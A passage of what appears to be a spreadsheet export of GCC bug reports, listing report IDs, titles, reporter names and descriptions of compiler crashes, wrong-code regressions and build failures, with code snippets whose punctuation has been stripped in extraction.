) at ../../gcc/fortran/parse.c:65
#12 0x0807ed1d in decode_statement () at ../../gcc/fortran/parse.c:134
#13 0x0807f745 in next_statement () at ../../gcc/fortran/parse.c:358
#14 0x08080a5b in parse_spec (st=ST_NONE) at ../../gcc/fortran/parse.c:1556
#15 0x080815f9 in gfc_parse_file () at ../../gcc/fortran/parse.c:2501
#16 0x0809cadd in gfc_be_parse_file (set_yydebug=0) at ../../gcc/fortran/f95-lang.c:286
#17 0x0836cf40 in toplev_main (argc=2 argv=0xbfffefd4) at ../../gcc/toplev.c:990
#18 0x080c766f in main (argc=Cannot access memory at address 0x0
) at ../../gcc/main.c:35
(gdb)</t>
  </si>
  <si>
    <t>GCC-81169</t>
  </si>
  <si>
    <t>[8 Regression] gcc 8.0dev -Wclass-memaccess illegitimate warning related to volatile</t>
  </si>
  <si>
    <t>With GCC r249467 the following snippet
{{{
#include 
struct mystruct
{
    double      x
}
void zero(volatile mystruct* x int n)
{
    memset(static_cast(const_cast(x))
           0 n*sizeof(mystruct))
}
}}}
causes
{{{
$ g++ -Wall test_memaccess.cpp -c
test_memaccess.cpp: In function 'void zero(volatile mystruct* int)':
test_memaccess.cpp:11:33: warning: 'void* memset(void* int size_t)' clearing an object of type 'volatile struct mystruct' with no trivial copy-assignment use assignment or value-initialization instead [-Wclass-memaccess]
            0 n*sizeof(mystruct))
                                 ^
test_memaccess.cpp:3:8: note: 'volatile struct mystruct' declared here
 struct mystruct
        ^~~~~~~~
}}}
Removing the volatile qualifier prevents the warning from being emitted.</t>
  </si>
  <si>
    <t>dudul04</t>
  </si>
  <si>
    <t>GCC-25395</t>
  </si>
  <si>
    <t>equivalence to common block array broken</t>
  </si>
  <si>
    <t>The following code shows the problem:
      program test
      common /abc/ mwkx(80)
      dimension    listpr(20)lisbit(10)lispat(8)
*     This is badly compiled
*     ======================
      equivalence (listpr(10)lisbit(1)mwkx(10))
     +           (listpr(10)lispat(1))
      do i = 120
        listpr(i) = 0
      enddo
      do i = 110
        lisbit(i) = i
      enddo
      do j = 34
        lisbit(j) = 0
      enddo
      print * '======================================================'
      print * 'wrong result:'
      print '(20i4)' listpr
      call sub1
      call sub2
      stop
      end
      subroutine sub1
      common /abc/ mwkx(80)
      dimension    listpr(20)lisbit(10)lispat(8)
*     This is a workaround
*     ====================
      equivalence (listpr(10)lisbit(1)) (listpr(10)mwkx(10))
     +           (listpr(10)lispat(1))
      do i = 120
        listpr(i) = 0
      enddo
      do i = 110
        lisbit(i) = i
      enddo
      do j = 34
        lisbit(j) = 0
      enddo
      print * '======================================================'
      print * 'correct result:'
      print '(20i4)' listpr
      end
      subroutine sub2
*     This gives correct results
*     ==========================
      dimension    mwkx(80)
      dimension    listpr(20)lisbit(10)lispat(8)
      equivalence (listpr(10)lisbit(1)mwkx(10))
     +           (listpr(10)lispat(1))
      do i = 120
        listpr(i) = 0
      enddo
      do i = 110
        lisbit(i) = i
      enddo
      do j = 34
        lisbit(j) = 0
      enddo
      print * '======================================================'
      print * 'correct result (common replaced by dimension):'
      print '(20i4)' listpr
      end
This yields the following output:
 ======================================================
 wrong result:
   0   0   0   0   0   0   0   0   0   0   0   0   0   0   0   0   0   0   0   0
 ======================================================
 correct result:
   0   0   0   0   0   0   0   0   0   1   2   0   0   5   6   7   8   9  10   0
 ======================================================
 correct result (common replaced by dimension):
   0   0   0   0   0   0   0   0   0   1   2   0   0   5   6   7   8   9  10   0</t>
  </si>
  <si>
    <t>harald.vogt</t>
  </si>
  <si>
    <t>GCC-67056</t>
  </si>
  <si>
    <t>[5 regression] Wrong code generated</t>
  </si>
  <si>
    <t>Yes I know a very bad summary. I need some help to narrow it down.
When upgrading compile from 4.9.3 to 5.2 1 of our unit tests started failing with segmentation fault. It compiles fine but generates bad code. There are no warning neither with 4.9.3 nor with 5.2. We are also running the unit tests with latest valgrind. With 5.2 valgrind complains about accessing deleted memory.
I am not sure how I best can provide you with what you need in order to investigate this as it fails at runtime and the unit test uses other shared libraries. Any suggestions ?
I have made the following observations.
1 - We are building with -O3. The issue is also present at -O2. However if I add -fno-tree-vrp it improves. Then there is no segmentation fault but valgrind complains about a memory leak. It fails to run a destructor.
2 - I can fix the issue by reordering members in one class from
    ConfigSnapshot snap
    std::atomic configured
    std::atomic throwException
to
    std::atomic configured
    std::atomic throwException
    ConfigSnapshot snap
Then valgrind is happy to. No need for tinkering with the compile flags.
3 - I move the implementation of the destructor and the constructor out of the class definition and add __attribute__((noinline)) to them.
Then everything works perfectly too.
What can I provide that can help you investigate this ?
This is the compile command for the unit test. The code that I mention in 2 and 3 are both contained in the file compiled here.
g++ -g -O3 -Wuninitialized -Werror -Wall -W -Wchar-subscripts -Wcomment -Wformat -Wparentheses -Wreturn-type -Wswitch -Wtrigraphs -Wunused -Wshadow -Wpointer-arith -Wcast-qual -Wcast-align -Wwrite-strings -DGCC_X86_64 -fPIC -D_GLIBCXX_USE_CXX11_ABI=0 -DBOOST_DISABLE_ASSERTS -march=westmere -mtune=intel -Wnon-virtual-dtor -std=c++14 -fvisibility-inlines-hidden             -DNOT_BOOST_SPIRIT_THREADSAFE=1 -DNOT_PHOENIX_THREADSAFE=1 -DBOOST_NO_AUTO_PTR=1        -I../.. -I/home/balder/build/lz4-PREINST/lz4-install/include  -I/home/balder/build/staging_vespalib-HEAD/staging_vespalib-install/include -I/home/balder/build/ytracelib-PREINST/ytracelib-install/include  -I/home/balder/build/fastlib-HEAD/fastlib-install/include -I/home/balder/build/fnet-HEAD/fnet-install/include -I/home/balder/build/vespalib-HEAD/vespalib-install/include -isystem /home/balder/build/llvm-PREINST/llvm-install/include -isystem /home/balder/build/boost-PREINST/boost-install/include/ -I/home/balder/build/vespalog-HEAD/vespalog-install/include -I/home/balder/build/fastos-HEAD/fastos-install/include   -DV_TAG_DATE='20150729.142010'  -DV_TAG_YINST='5.81.0.20150729.142010'  -DV_TAG_COMPONENT='5.81.0'  -DV_TAG_ARCH='x86_64'  -DV_TAG_SYSTEM='Linux'  -DV_TAG_SYSTEM_REV='rhel-6.6'  -DV_TAG_BUILDER='balder@honda.trondheim.corp'  -DV_TAG='CURRENT'  -c configretriever.cpp -o configretriever.o
g++ -v
[balder@honda configretriever]$ g++ -v
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/home/y/bin64/../libexec/gcc/x86_64-redhat-linux/5.2.0/lto-wrapper
Target: x86_64-redhat-linux
Configured with: ./configure --prefix=/home/y --enable-languages=cc++ --host=x86_64-redhat-linux --build=x86_64-redhat-linux --target=x86_64-redhat-linux --disable-bootstrap LDFLAGS='-Wl-rpath/home/y/lib64 -L/home/y/lib64' --with-mpc=/home/y --with-gmp=/home/y --with-mpfr=/home/y
Thread model: posix
gcc version 5.2.0 (GCC)</t>
  </si>
  <si>
    <t>balder</t>
  </si>
  <si>
    <t>GCC-3994</t>
  </si>
  <si>
    <t>m68k uses illegal assembler code</t>
  </si>
  <si>
    <t>[ Reported to the Debian BTS as report #89023.
  Please CC 89023-quiet@bugs.debian.org on replies.
  Log of report can be found at http://bugs.debian.org/89023 ]
It works fine when compiling the offending file with -O1 compiling with -O2 and higher fails. Reported for gcc-2.95.x behaviour seen in 3.0.x as well.
Full log at:
http://people.debian.org/~cts/failed_logs/libgmp3_3.1.1-2.dsc_20010308-2328
rm -f .libs/gcdext.lo
gcc -DHAVE_CONFIG_H -I. -I. -I.. -I.. -DOPERATION_gcdext -O3 -c gcdext.c  -fPIC -DPIC -o .libs/gcdext.lo
gcdext.c: In function `__gmpn_gcdext':
gcdext.c:700: internal error--unrecognizable insn:
(insn 1116 5099 5102 (parallel[ 
            (set (reg:SI 1 %d1)
                (asm_operands (add%.l %5%1
        addx%.l %3%0) (=d) 0[ 
                        (mem:SI (plus:SI (reg:SI 14 %a6)
                                (const_int -56 [0xffffffc8])) 0)
                        (reg:SI 1 %d1)
                        (reg:SI 2 %d2)
                        (mem:SI (plus:SI (reg:SI 14 %a6)
                                (const_int -12 [0xfffffff4])) 0)
                    ] 
                    [ 
                        (asm_input:SI (%0))
                        (asm_input:SI (d))
                        (asm_input:SI (%1))
                        (asm_input:SI (g))
                    ]  (gcdext.c) 325))
            (set (reg:SI 2 %d2)
                (asm_operands (add%.l %5%1
        addx%.l %3%0) (=&amp;d) 1[ 
                        (mem:SI (plus:SI (reg:SI 14 %a6)
                                (const_int -56 [0xffffffc8])) 0)
                        (reg:SI 1 %d1)
                        (reg:SI 2 %d2)
                        (mem:SI (plus:SI (reg:SI 14 %a6)
                                (const_int -12 [0xfffffff4])) 0)
                    ] 
                    [ 
                        (asm_input:SI (%0))
                        (asm_input:SI (d))
                        (asm_input:SI (%1))
                        (asm_input:SI (g))
                    ]  (gcdext.c) 325))
        ] ) -1 (nil)
    (nil))
make[4]: *** [gcdext.lo] Error 1
make[4]: Leaving directory `/build/cts/libgmp3-3.1.1/mpn'
Release:
3.0 (Debian GNU/Linux)
Environment:
System: Debian GNU/Linux (testing/unstable)
Architecture: m68k
host: i386-linux
build: i386-linux
target: i386-linux</t>
  </si>
  <si>
    <t>89023-quiet</t>
  </si>
  <si>
    <t>GCC-1310</t>
  </si>
  <si>
    <t>exit value after uncatched exception should be non-zero</t>
  </si>
  <si>
    <t xml:space="preserve">From: Tom Tromey 
To: osk@hem.passagen.se
Cc: java-gnats@sourceware.cygnus.com
Subject: Re: libgcj/289: exit value after uncatched exception should be non-zero
Date: Wed 19 Jul 2000 07:26:16 -0700 (PDT)
 Oskar&gt; When a program exits because of an uncatched exception
 Oskar&gt; the exit value should be non-zero. Programs compiled
 Oskar&gt; with gcj returns with 0 with an exception is thrown
 Oskar&gt; and the same applies for gij.
 Unfortunately this looks hard to fix.  Suppose there are two threads
 and one exits this way and the other exits normally?  I guess we could
 add a special case when there is a single thread.
 Tom
</t>
  </si>
  <si>
    <t>GCC-3040</t>
  </si>
  <si>
    <t>Fail build libmath at cygwin</t>
  </si>
  <si>
    <t>make[1]: Entering directory `/cygdrive/c/docume~1/wanderer/mydocu~1/project/Cigwin/build/gcc/obj/i686-pc-cygwin/libstdc++-v3'
make AR_FLAGS=rc      CC_FOR_BUILD=gcc      CC_FOR_TARGET=/cygdrive/c/docume~1/wanderer/mydocu~1/project/Cigwin/build/gcc
/obj/gcc/xgcc -B/cygdrive/c/docume~1/wanderer/mydocu~1/project/Cigwin/build/gcc/obj/gcc/ -B/usr/local/i686-pc-cygwin/bin/ -B/u
sr/local/i686-pc-cygwin/lib/ -isystem /usr/local/i686-pc-cygwin/include        CFLAGS=-g -O2         CXXFLAGS=-g -O2    
CFLAGS_FOR_BUILD=      CFLAGS_FOR_TARGET=-g -O2      INSTALL=/bin/sh /cygdrive/c/docume~1/wanderer/mydocu~1/project/Cigwin
/build/gcc/src/gcc31/gcc/install-sh -c         INSTALL_DATA=/bin/sh /cygdrive/c/docume~1/wanderer/mydocu~1/project/Cigwin/bu
ild/gcc/src/gcc31/gcc/install-sh -c -m 644     INSTALL_PROGRAM=/bin/sh /cygdrive/c/docume~1/wanderer/mydocu~1/project/Cigwin
/build/gcc/src/gcc31/gcc/install-sh -c         INSTALL_SCRIPT=/bin/sh /cygdrive/c/docume~1/wanderer/mydocu~1/project/Cigwin/
build/gcc/src/gcc31/gcc/install-sh -c  LDFLAGS=      LIBCFLAGS=-g -O2      LIBCFLAGS_FOR_TARGET=-g -O2   MAKE=make  
MAKEINFO=makeinfo      PICFLAG=      PICFLAG_FOR_TARGET=   SHELL=/bin/sh         RUNTESTFLAGS=         exec_prefix=/
usr/local      infodir=/usr/local/info       libdir=/usr/local/lib         includedir=/usr/local/include         prefi
x=/usr/local   tooldir=/usr/local/i686-pc-cygwin     AR=ar         AS=as         LD=ld         LIBCFLAGS=-g -O2   
PICFLAG=       RANLIB=ranlib         NM=nm         NM_FOR_BUILD=         NM_FOR_TARGET=nm      DESTDIR=      WERRO
R=  all-recursive
make[2]: Entering directory `/cygdrive/c/docume~1/wanderer/mydocu~1/project/Cigwin/build/gcc/obj/i686-pc-cygwin/libstdc++-v3'
Making all in libio
make[3]: Entering directory `/cygdrive/c/docume~1/wanderer/mydocu~1/project/Cigwin/build/gcc/obj/i686-pc-cygwin/libstdc++-v3/l
ibio'
make[3]: Nothing to be done for `all'.
make[3]: Leaving directory `/cygdrive/c/docume~1/wanderer/mydocu~1/project/Cigwin/build/gcc/obj/i686-pc-cygwin/libstdc++-v3/li
bio'
Making all in libmath
make[3]: Entering directory `/cygdrive/c/docume~1/wanderer/mydocu~1/project/Cigwin/build/gcc/obj/i686-pc-cygwin/libstdc++-v3/l
ibmath'
/bin/sh ../libtool --mode=compile /cygdrive/c/docume~1/wanderer/mydocu~1/project/Cigwin/build/gcc/obj/gcc/xgcc -B/cygdrive/c/d
ocume~1/wanderer/mydocu~1/project/Cigwin/build/gcc/obj/gcc/ -B/usr/local/i686-pc-cygwin/bin/ -B/usr/local/i686-pc-cygwin/lib/
-isystem /usr/local/i686-pc-cygwin/include -DHAVE_CONFIG_H -I. -I/home/administrator/pkg/build/gcc/src/gcc31/gcc/libstdc++-v3/
libmath -I.. -I/home/administrator/pkg/build/gcc/src/gcc31/gcc/libstdc++-v3/include -I../include             -g -O2 -c /home/a
dministrator/pkg/build/gcc/src/gcc31/gcc/libstdc++-v3/libmath/signbit.c
libtool: compile: unable to infer tagged configuration
libtool: compile: specify a tag with `--tag'
make[3]: *** [signbit.lo] Error 1
make[3]: Leaving directory `/cygdrive/c/docume~1/wanderer/mydocu~1/project/Cigwin/build/gcc/obj/i686-pc-cygwin/libstdc++-v3/li
bmath'
make[2]: *** [all-recursive] Error 1
make[2]: Leaving directory `/cygdrive/c/docume~1/wanderer/mydocu~1/project/Cigwin/build/gcc/obj/i686-pc-cygwin/libstdc++-v3'
make[1]: *** [all-recursive-am] Error 2
make[1]: Leaving directory `/cygdrive/c/docume~1/wanderer/mydocu~1/project/Cigwin/build/gcc/obj/i686-pc-cygwin/libstdc++-v3'
make: *** [all-target-libstdc++-v3] Error 2
I use for bootstrup configure:
/home/administrator/pkg/build/gcc/src/gcc31/gcc/configure --enable-threads=posix --enable-languages=c++
Release:
gcc version 3.1 20010603 (experimental)
Environment:
i686-pc-cygwin</t>
  </si>
  <si>
    <t>GCC-46552</t>
  </si>
  <si>
    <t>[4.6 Regression] [C++0x] Internal compiler error on pointer to member variable with template</t>
  </si>
  <si>
    <t>The compiler says:
test.cpp: In function â€˜void f()â€™:
test.cpp:9:9: internal compiler error: unexpected expression â€˜S::xâ€™ of kind offset_ref
Please submit a full bug report
with preprocessed source if appropriate.
I compiled following code with g++ 4.6.0 20101110.
But g++ 4.6.0 20101102 does not report this error.
struct S
{
    int x
}
template 
void f( void )
{
}</t>
  </si>
  <si>
    <t>GCC-67240</t>
  </si>
  <si>
    <t>[concepts] Implicit conversion constraints are not respected</t>
  </si>
  <si>
    <t>Using the trailing return type to add constraints does not work in some cases. The following code should not compile:
int foo(int x)
{
    return x
}
template 
concept bool C1 = requires (T x) {
    {foo(x)} -&gt; int
}
template 
concept bool C2 = requires (T x) {
    {foo(x)} -&gt; void
}
static_assert( C1 )
static_assert( C2 )
However this compiles just fine with r226884.</t>
  </si>
  <si>
    <t>sebi707</t>
  </si>
  <si>
    <t>GCC-11105</t>
  </si>
  <si>
    <t>[3.3/3.4 regression of sorts] ICE in mangle_conv_op_name_for_type</t>
  </si>
  <si>
    <t>[Mark this is likely related to 8006 and 9729 which is why I CC: you]
This is an attempt to work around a problem in 11097 but with both
3.3 and mainline we either get an error for an ABI problem or if
one specifies -fabi-version=0 an ICE (see below). The code compiled
with prior versions although probably to bogus results. So it's
a regression-of-sorts but the present state is clearly not very
desirable -- you can't compile the code even if the miscompilation
would not lead to problems in a given program.
So here's the testcase:
----------------------------------
template  struct S {
    struct I{}
    operator I* ()
}
template  struct S2 : S {
    operator typename S::I* ()
}
template struct S2
--------------------------------
g/x&gt; /home/bangerth/bin/gcc-3.4-pre/bin/c++ -c x.cc -fabi-version=1
x.cc:7: error: due to a defect in the G++ 3.2 ABI G++ has assigned the same
   mangled name to two different types
g/x&gt;
g/x&gt;
g/x&gt; /home/bangerth/bin/gcc-3.4-pre/bin/c++ -c x.cc -fabi-version=0
x.cc:7: internal compiler error: in mangle_conv_op_name_for_type at
   cp/mangle.c:2653
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Results with 3.3 are the same.
W.</t>
  </si>
  <si>
    <t>GCC-51289</t>
  </si>
  <si>
    <t>[C++0x] Template template alias causes ICE</t>
  </si>
  <si>
    <t>gcc version 4.7.0 20111112 (experimental) (GCC) 
Getting ICE when trying to use an alias to template template parameter:
template class b&gt;
struct foo {
  template 
  using type = b
  template 
  b funca() {} // OK!
  template 
  type funcb() {} // Compiler error! Should be have same behavior as funca.
}
main.cpp:10:9: internal compiler error: in lookup_template_class_1 at cp/pt.c:7299</t>
  </si>
  <si>
    <t>pubby.8</t>
  </si>
  <si>
    <t>GCC-42082</t>
  </si>
  <si>
    <t>[C++0x] ICE on probably invalid with canonical types differ for identical types</t>
  </si>
  <si>
    <t>The attached code causes an ICE with gcc 4.5 20091112. I'm somewhat certain but not positive that it is not valid code.
$ g++-4.5-20091112 -std=c++0x decl.cpp -o decl
decl.cpp: In function 'std::unique_future async(F) [with T = int F = main()::]':
decl.cpp:16:30:   instantiated from here
decl.cpp:7:46: internal compiler error: canonical types differ for identical types int() and int()
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-30625</t>
  </si>
  <si>
    <t>Array pointers to components of derived type arrays do not work</t>
  </si>
  <si>
    <t>This:
type :: a
  real :: r = 3.14159
  integer :: i = 42
end type a
type(a) target :: dt(2)
integer pointer :: ip(:)
ip =&gt; dt%i
print * ip
end
produces
$ ./a
  1078530000          42
with gfortran whereas the correct result should be two 42s
Paul</t>
  </si>
  <si>
    <t>GCC-3700</t>
  </si>
  <si>
    <t>ISSUE_RATE not defined for mips target</t>
  </si>
  <si>
    <t>The ISSUE_RATE macro is not defined in gcc/config/mips/mips.h
As a consequence the haifa scheduler assumes ISSUE_RATE = 1
and produces a totally wrong schedule.
Release:
gcc-3.0
Environment:
IRIX64 fp98 6.5 04131233 IP27</t>
  </si>
  <si>
    <t>GCC-63460</t>
  </si>
  <si>
    <t>[4.9/5 Regression] Some namelists cannot be read from stdin (unit 5): Fortran runtime error: End of file</t>
  </si>
  <si>
    <t>The following Fortran program when compiled with gfortran 4.9.1 or trunk (5.0) cannot read a valid namelist file from stdin (unit 5).
Reading it from another unit (or as an internal file) proceeds fine.
Fortran program:
      character*10 file /'noot.hdf'/
      character*5  aap(10) /10*/
      integer      par(10) /10*3/
      namelist /namlis/ file aap par
      read (5 namlis)
      write(6 namlis)
      end
Namelist file (which is redirected to stdin):
&amp;NAMLIS
file='aap.hdf' aap(5)='noot' par(5)=6
/</t>
  </si>
  <si>
    <t>GCC-83507</t>
  </si>
  <si>
    <t>[8 Regression] ICE in internal_dfa_insn_code_* for powerpc targets</t>
  </si>
  <si>
    <t>gcc-8.0.0-alpha20171217 snapshot (r255766) ICEs when compiling the following snippet for powerpc targets w/ -mcpu=power7 (476 476fp 604 604e 620 630 cell power3 power8 powerpc powerpc64le) -O2 -fmodulo-sched -fno-tree-ter -fno-tree-coalesce-vars:
void
r2 (unsigned short int qe unsigned char ng)
{
  unsigned char *k5 = 
  unsigned short int w4
  int a8
  while (ng &lt; 3)
    {
      if (qe != 0)
        ++ng
      ++ng
    }
  for (a8 = 0 a8 &lt; 5 ++a8)
    {
      int l3
      l3 = 1
      l3 += w4 &gt; qe
      ng 
    }
  do
    {
      a8 += ng
      qe = a8
    }
  while (qe != 0)
}
% powerpc-e300c3-linux-gnu-gcc-8.0.0-alpha20171217 -O2 -fmodulo-sched -fno-tree-ter -fno-tree-coalesce-vars -c r9ldrjtv.c
r9ldrjtv.c: In function 'r2':
r9ldrjtv.c:30:1: error: unrecognizable insn:
 }
 ^
(insn 78 0 0 (set (reg:SI 149)
        (reg:SI 76 ca)) -1
     (nil))
during RTL pass: sms
r9ldrjtv.c:30:1: internal compiler error: in internal_dfa_insn_code_power7 at config/rs6000/rs6000.md:7837
0x5484ba _fatal_insn(char const* rtx_def const* char const* int char const*)
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20171217/work/gcc-8-20171217/gcc/rtl-error.c:108
0x5484fa _fatal_insn_not_found(rtx_def const* char const* int char const*)
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20171217/work/gcc-8-20171217/gcc/rtl-error.c:116
0x11cb121 internal_dfa_insn_code_power7(rtx_insn*)
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20171217/work/gcc-8-20171217/gcc/config/rs6000/rs6000.md:7837
0x11b60d3 dfa_insn_code
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20171217/work/build/gcc/insn-automata.c:123145
0x11b60d3 insn_latency(rtx_insn* rtx_insn*)
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20171217/work/build/gcc/insn-automata.c:124510
0x1459e9d schedule_reg_move
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20171217/work/gcc-8-20171217/gcc/modulo-sched.c:589
0x1459e9d schedule_reg_moves
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20171217/work/gcc-8-20171217/gcc/modulo-sched.c:797
0x145bbf0 sms_schedule
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20171217/work/gcc-8-20171217/gcc/modulo-sched.c:1678
0x145d382 execute
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20171217/work/gcc-8-20171217/gcc/modulo-sched.c:3342</t>
  </si>
  <si>
    <t>GCC-1980</t>
  </si>
  <si>
    <t>Error assigning const array</t>
  </si>
  <si>
    <t>The following code does not compile gcc says
test.cc: In method `S::S(const S &amp;)':
test.cc:5: incompatible types in assignment of `const char[2]' to `char[2]'
Release:
2.97 20010122 (experimental)
Environment:
System: Linux rose 2.2.13 #1 Mon Nov 8 15:08:22 CET 1999 i586 unknown
Architecture: i586
host: i586-pc-linux-gnu
build: i586-pc-linux-gnu
target: i586-pc-linux-gnu
configured with: ../configure --prefix=/local/pkg/gcc/20010122 --with-gnu-as=/local/bin/as --with-gnu-ld=/local/bin/ld
How-To-Repeat:
struct S {
  char x[2]
  S( const S &amp;s )
  {
    x = s.x
  }
}
// Note that gcc -ansi -pedantic will tell you that ISO C++ forbids assignment of arrays.</t>
  </si>
  <si>
    <t>fp</t>
  </si>
  <si>
    <t>GCC-25785</t>
  </si>
  <si>
    <t>[4.1/4.2 Regression] gfortran - incorrectly issues an error on tests for optional arguments with assumed length</t>
  </si>
  <si>
    <t>gfortran has started erroring on some present statements (Absoft and others have no problem with this program and older version of gfortran were also happy with it) -
[dranta:~/tests/gfortran-D] dir% f90 -c present01.f90
[dranta:~/tests/gfortran-D] dir% gfortran -c present01.f90
 In file present01.f90:3
        if (present(data_c1)) then
                   1
Error: The upper bound in the last dimension must appear in the reference to the assumed size array 'data_c1' at (1).
[dranta:~/tests/gfortran-D] dir% cat present01.f90
      subroutine my_sio_file_write_common(data_c1)
        character   intent(in) optional :: data_c1(*)
        if (present(data_c1)) then
        endif
      end subroutine my_sio_file_write_common
[dranta:~/tests/gfortran-D] dir% gfortran --v
Using built-in specs.
Target: powerpc-apple-darwin8.4.0
Configured with: ../gcc/configure --prefix=/Users/dir/gfortran --enable-languages=cf95
Thread model: posix
gcc version 4.2.0 20060113 (experimental)</t>
  </si>
  <si>
    <t>GCC-53308</t>
  </si>
  <si>
    <t>AIX 5.3 segmentation fault with basic_ofstream pthread and -O2</t>
  </si>
  <si>
    <t>Created attachment 27365
This is the preprocessed file
On AIX 5.3 this program has a segmentation fault when built using both pthread and O2.  It runs normally when that particular combination is not used.
Source file: t.cpp
#include 
int main(int argc char** argv)
{
  std::basic_ofstream f(a.txt std::ios::out)
  return 0
}
g++ -v 
Using built-in specs.
Target: powerpc-ibm-aix5.3.0.0
Configured with: /home/askees/gcc/gcc-4.4.7/configure --prefix=/usr/local/gnu/gcc/gcc-4.4.7 --with-gmp=/usr/local/gnu/gmp/gmp-5.0.1 --with-mpfr=/usr/local/gnu/mpfr/mpfr-2.4.2 --enable-threads=posix --enable-languages=cc++ --with-as=/usr/bin/as --with-ld=/usr/bin/ld --host=powerpc-ibm-aix5.3.0.0 --target=powerpc-ibm-aix5.3.0.0 --build=powerpc-ibm-aix5.3.0.0
Thread model: aix
gcc version 4.4.7 (GCC)
Compile
g++ t.cpp -O2 -L/usr/lib/threads -pthread</t>
  </si>
  <si>
    <t>GCC-6578</t>
  </si>
  <si>
    <t>-ftrapv doesn't catch multiplication overflow</t>
  </si>
  <si>
    <t>Multiplication overflow is not caught by -ftrapv in 50% of the cases o=
n
average.
$ cat foo.c
int foo (int x int y)
{
  return x * y
}
int main ()
{
  foo(6000000001024)
  return 0
}
$ gcc -v
Lecture des sp=E9cification =E0 partir de /packages/gnu-snapshot/lib/gc=
c-lib/i686-pc-linux-gnu/3.1/specs
Configur=E9 avec: ../configure --prefix=3D/packages/gnu-snapshot --enab=
le-shared --enable-version-specific-runtime-libs --enable-nls
Mod=E8le de thread: single
version gcc 3.1 20020423 (prerelease)
$ gcc -ftrapv foo.c
$ ./a.out=20
$ echo $?
0
The reason is simply a broken __mulvsi3 implementation in libgcc2.c.
Other -ftrapv helper functions are broken as well:
- __subvsi3 may not behave correctly if b =3D -0x80000000.
- __subvdi3 has an obvious typo that could cause wrong results.
- __mulvsi3 has a wrong overflow check.
- __absvdi2 has an obvious typo that could cause wrong results.
- __mulvdi3 has a wrong overflow check.
Release:
=093.1 20020423 (prerelease)
Environment:
System: Linux linuix 2.4.18-4GB #1 Wed Mar 27 13:57:05 UTC 2002 i686 un=
known
Architecture: i686
=09
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../configure --prefix=3D/packages/gnu-snapshot --enabl=
e-shared --enable-version-specific-runtime-libs --enable-nls
How-To-Repeat:
See above</t>
  </si>
  <si>
    <t>GCC-12995</t>
  </si>
  <si>
    <t>[3.4 Regression] ICE with -dP</t>
  </si>
  <si>
    <t>compiling this small source:
--------------------
int miao()
{
  int m = 10
}
--------------------
/scratch/rossetti/local/bin/gcc -v -fdump-tree-original-all -O0 -dA -dP  -S bug1.c
Reading specs from
/bigfoot/home3/scratch/rossetti/local/bin/../lib/gcc/i686-pc-linux-gnu/3.4/specs
Configured with: ../ngcc/trunk/configure --prefix=/scratch/rossetti/local
--enable-languages=c
Thread model: posix
gcc version 3.4 20031029 (experimental)
 /bigfoot/home3/scratch/rossetti/local/bin/../libexec/gcc/i686-pc-linux-gnu/3.4/cc1 -quiet -v -iprefix /bigfoot/home3/scratch/rossetti/local/bin/../lib/gcc/i686-pc-linux-gnu/3.4/ bug1.c -quiet -dumpbase bug1.c -dA -dP -mtune=pentiumpro -auxbase bug1 -O0 -version -fdump-tree-original-all -o bug1.s
calling dump_switch_p
ignoring nonexistent directory
/bigfoot/home3/scratch/rossetti/local/bin/../lib/gcc/i686-pc-linux-gnu/3.4/../../../../i686-pc-linux-gnu/include
ignoring duplicate directory
/scratch/rossetti/local/lib/gcc/i686-pc-linux-gnu/3.4/include
ignoring nonexistent directory
/scratch/rossetti/local/lib/gcc/i686-pc-linux-gnu/3.4/../../../../i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /bigfoot/home3/scratch/rossetti/local/bin/../lib/gcc/i686-pc-linux-gnu/3.4/include
 /usr/local/include
 /scratch/rossetti/local/include
 /usr/include
End of search list.
GNU C version 3.4 20031029 (experimental) (i686-pc-linux-gnu)
        compiled by GNU C version 3.2.2 20030222 (Red Hat Linux 3.2.2-5).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
bug1.c: In function `miao':
bug1.c:4: internal compiler error: in print_reg at config/i386/i386.c:6976
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make: *** [bug1.s] Error 1</t>
  </si>
  <si>
    <t>GCC-34711</t>
  </si>
  <si>
    <t>[4.3 Regression] g++.dg/tree-ssa/ivopts-1.C fails for power and arm</t>
  </si>
  <si>
    <t>There are already two other problem reports for failures of this test: PR target/26726 for i?86 and x86_64 and PR target/27707 for hppa.  Those are not regressions.  The test started failing for powerpc64-linux-gnu both -m32 and -m64 with this patch:
    http://gcc.gnu.org/viewcvs?view=rev&amp;rev=128272
    r128272 | rakdver | 2007-09-08 13:18:49 +0000 (Sat 08 Sep 2007)
Test results for other powerpc targets show that they start failing later here are the targets and the ranges in which they start failing plus a couple of arm targets:
  powerpc-ibm-aix5.3.0.0      2007-10-20 to 2007-10-30
  powerpc-apple-darwin8.5.0   2007-10-24 to 2007-11-01
  arm-none-eabi               2007-10-27 to 2007-10-29
  arm-none-linux-gnueabi      2007-12-25 to 2007-12-26
I'll find out which patches caused the test to start failing for these targets.</t>
  </si>
  <si>
    <t>GCC-2183</t>
  </si>
  <si>
    <t>gcc-3_0-branch compiles 2x slower than 2.95</t>
  </si>
  <si>
    <t>This is my first experience with GCC 3.0.  I am compiling
a ca. 100000 line C++ program which takes modest advantage
of templates (STL mostly) and exceptions.  By virtue of
being ported to a variety of platforms the code compiled
with 3.0 pretty much out of the box.
However compile time is noticably higher going from 
exactly 15 minutes with 2.95 to exactly 30 minutes with 3.0.
Pertinent compile flags are:  -ggdb -ansi -pedantic -W
I have not compared the compile time for optimization
because this does not affect my daily work.
